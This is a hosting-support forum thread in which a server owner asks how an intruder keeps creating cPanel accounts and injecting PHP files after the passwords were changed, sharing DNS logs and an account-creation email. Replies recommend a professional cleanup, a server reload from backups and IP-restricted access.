Skip to main content

Compromised Server Questions

alex128002
Hi, An hacker has been able to infiltrate my server with cPanel / WHM. He's currently able to create / suspend / unsuspend accounts, as well as log into somes FTP accounts and inject PHP files. I have modified every passwords, but he still has access to the server. I really don't know how he still can access the server. Here's an example from the log file on how an account was created :
Jun 24 17:01:58 main named[2867]: received control channel command 'reconfig' Jun 24 17:01:58 main named[2867]: loading configuration from '/etc/named.conf' Jun 24 17:01:58 main named[2867]: using default UDP/IPv4 port range: [1024, 65535] Jun 24 17:01:58 main named[2867]: using default UDP/IPv6 port range: [1024, 65535] Jun 24 17:01:58 main named[2867]: couldn't mkdir '/var/run/named': Permission denied Jun 24 17:01:58 main named[2867]: generating session key for dynamic DNS Jun 24 17:01:59 main named[2867]: couldn't mkdir '/var/run/named': Permission denied Jun 24 17:01:59 main named[2867]: could not create /var/run/named/session.key Jun 24 17:01:59 main named[2867]: failed to generate session key for dynamic DNS: permission denied Jun 24 17:01:59 main named[2867]: sizing zone task pool based on 131 zones Jun 24 17:01:59 main named[2867]: Warning: view localhost_resolver: 'empty-zones-enable/disable-empty-zone' not set: disabling RFC 1918 empty zones Jun 24 17:01:59 main named[2867]: Warning: view internal: 'empty-zones-enable/disable-empty-zone' not set: disabling RFC 1918 empty zones Jun 24 17:01:59 main named[2867]: reloading configuration succeeded Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/internal: loaded serial 2015062401 Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/external: loaded serial 2015062401 Jun 24 17:01:59 main named[2867]: any newly configured zones are now loaded Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/internal: sending notifies (serial 2015062401) Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/external: sending notifies (serial 2015062401) Jun 24 17:02:03 main named[2867]: received control channel command 'reload hackerdomain.com IN external' Jun 24 17:02:03 main named[2867]: zone hackerdomain.com/IN/external: loaded serial 2015062403 Jun 24 17:02:03 main named[2867]: received control channel command 'reload hackerdomain.com IN internal' Jun 24 17:02:03 main named[2867]: zone hackerdomain.com/IN/internal: loaded serial 2015062403 Jun 24 17:02:04 main named[2867]: zone hackerdomain.com/IN/internal: sending notifies (serial 2015062403) Jun 24 17:02:04 main named[2867]: zone hackerdomain.com/IN/external: sending notifies (serial 2015062403)
And here's the email that cPanel sent to me :
New Account created. Domain: hackerdomain.com IP Address: xxx.xx.xx.xx (Shared) CGI Access: Enabled Username: hackerdomain Password: ***HIDDEN*** cPanel Theme: x3 Home Directory: /home Quota: 15,000 MB Name Server 1: swdomains.venus.orderbox-dns.com Name Server 2: swdomains.mercury.orderbox-dns.com Name Server 3: swdomains.mars.orderbox-dns.com Name Server 4: swdomains.earth.orderbox-dns.com Contact Email: admin@hackerdomain.com Package: giga Feature List: default Locale: en The account was set up by the reseller "main" with the effective user ID of "root".
Does someone have an idea on how the hacker can access the server? Thank you in advance for your help.

Comments

2 comments

Date Votes
  • Infopro
    If you believe your server is compromised, and you're unsure of the way forward, you should look into hiring a professional to assist you. Waiting for a reply on the forum is not the best way to go here. cPanel cannot assist you with a compromised server. You might want to contact your Hosting Provider or Data Center for suggestions on locking down that server until you can get a security professional to assist you with cleaning it up, if thats even possible. Once the server is compromised, the only real, best option is to reload the server from scratch and restore accounts from safe backups. Good luck with this.
    0
  • keat63
    Alex. I know nothing regarding security, so i'm not really placed to offer any clean up assistance, however i am intrigued. Did you change the root password ? If reloading the server is not an option, then i'd like to suggest that you configure Host Access Control so that only your own IP's are granted access to these areas. This might afford you some time to seek further advice.
    0

Please sign in to leave a comment.

Didn't find what you were looking for?

New post